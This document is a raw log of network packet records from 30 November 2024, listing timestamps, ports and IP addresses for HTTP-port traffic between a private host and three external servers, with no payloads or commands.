Nov 30, 2024 04:06:12.437129021 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.437185049 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.437220097 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.437268019 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.438059092 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.438124895 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.438169956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.438225985 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.439008951 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.439066887 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:12.439099073 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:12.439148903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:14.656290054 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:14.656563044 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:14.776420116 CET	80	49780	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:14.776447058 CET	80	49759	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:14.776525021 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:14.776545048 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:14.778239012 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:14.898075104 CET	80	49780	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:16.203892946 CET	80	49780	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:16.203948021 CET	49780	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:16.207921982 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:16.327811956 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:16.327881098 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:16.328048944 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:16.447897911 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754750967 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754770994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754781961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754930973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.754940033 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754951954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754961967 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754976034 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.754987955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.755009890 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.755028009 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.755254030 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.755265951 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.755278111 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.755290031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.755309105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.874991894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.875005007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.875179052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.965364933 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.965384007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.965461016 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.969387054 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.969490051 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.969644070 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.977797985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.977858067 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.977914095 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.977951050 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.986193895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.986246109 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.986288071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.986325979 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.994549036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.994635105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:17.994642973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:17.994757891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.002976894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.003042936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.003045082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.003082037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.011399984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.011495113 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.011548996 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.011591911 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.019814968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.019869089 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.019882917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.019911051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.028163910 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.028238058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.028283119 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.028326035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.036566019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.036638975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.036726952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.036772966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.044977903 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.045011997 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.045042992 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.045073986 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.175812960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.175848961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.175893068 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.175935984 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.178689003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.178745031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.178750038 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.178795099 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.184266090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.184325933 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.184370041 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.184411049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.189968109 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.190026999 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.190054893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.190097094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.195544004 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.195606947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.195643902 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.195688963 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.201210976 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.201251030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.201319933 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.201363087 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.206928968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.206959963 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.207072020 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.207072020 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.212590933 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.212652922 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.212702036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.212749958 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.218233109 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.218283892 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.218363047 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.218405962 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.223867893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.223922014 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.223984957 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.224028111 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.229562998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.229644060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.229665041 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.229697943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.235227108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.235289097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.235301971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.235344887 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.240856886 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.240942955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.240953922 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.241003990 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.246459007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.246529102 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.246555090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.246602058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.252139091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.252219915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.252255917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.252311945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.257783890 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.257847071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.257858992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.257900000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.263510942 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.263566017 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.263572931 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.263608932 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.269126892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.269186020 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.269229889 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.269274950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.274787903 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.274852991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.274877071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.274950027 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.280428886 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.280498028 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.389585972 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.389703989 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.389811039 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.389811039 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.391798019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.391855955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.391875982 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.391922951 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.396259069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.396330118 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.396365881 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.396409035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.400732994 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.400753975 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.400794983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.400844097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.405210018 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.405287981 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.405313015 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.405359983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.409682989 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.409766912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.409802914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.409852028 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.414177895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.414232016 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.414241076 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.414284945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.418633938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.418685913 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.418726921 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.418771982 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.423119068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.423165083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.423221111 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.423261881 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.427592039 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.427639008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.427714109 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.427757978 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.431812048 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.431859970 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.431977034 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.432015896 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.436151981 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.436207056 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.436211109 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.436250925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.440315962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.440370083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.440439939 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.440484047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.444684982 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.444698095 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.444746971 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.448854923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.448869944 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.448909998 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.453025103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.453079939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.453113079 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.453157902 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.457217932 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.457285881 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.457374096 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.457418919 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.461446047 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.461498022 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.461726904 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.461777925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.465636969 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.465708017 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.465742111 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.465787888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.469904900 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.469974995 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.469995022 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.470041037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.474098921 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.474164009 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.474211931 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.474257946 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.478367090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.478441000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.478477955 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.478528023 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.482599020 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.482654095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.482695103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.482738018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.486777067 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.486872911 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.486900091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.486953974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.490998983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.491072893 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.491142988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.491199970 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.495285988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.495338917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.495371103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.495417118 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.499506950 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.499577045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.499583960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.499625921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.503695965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.503747940 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.503807068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.503855944 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.507966995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.508013964 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.508076906 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.508122921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.512128115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.512166023 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.512182951 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.512217045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.600203991 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.600222111 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.600255966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.600281954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.601696968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.601751089 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.601808071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.601846933 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.604795933 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.604842901 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.604907990 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.604950905 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.607952118 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.607997894 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.608071089 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.608112097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.611079931 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.611129045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.611197948 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.611255884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.614200115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.614304066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.614308119 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.614361048 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.617197037 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.617247105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.617356062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.617398977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.620184898 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.620229959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.620271921 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.620313883 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.623053074 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.623102903 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.623121977 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.623172045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.625984907 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.626029968 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.626069069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.626122952 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.628856897 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.628901958 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.628932953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.629041910 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.631730080 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.631772995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.631791115 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.631865978 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.634444952 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.634496927 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.634578943 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.634622097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.637255907 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.637300968 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.637343884 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.637434006 CET	49782	80	192.168.2.4	185.215.113.16
